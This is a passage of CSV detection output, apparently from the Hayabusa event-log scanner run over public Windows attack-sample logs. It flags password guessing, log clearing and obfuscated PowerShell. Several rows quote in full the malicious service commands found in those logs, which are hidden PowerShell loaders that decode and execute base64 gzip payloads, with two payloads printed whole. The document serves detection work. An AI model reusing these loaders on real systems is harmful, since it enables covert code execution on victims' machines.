NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6G
WDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pV
n9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx -2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx -2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx -2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx -2017-06-13 08:39:43.512 
+09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
-2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web 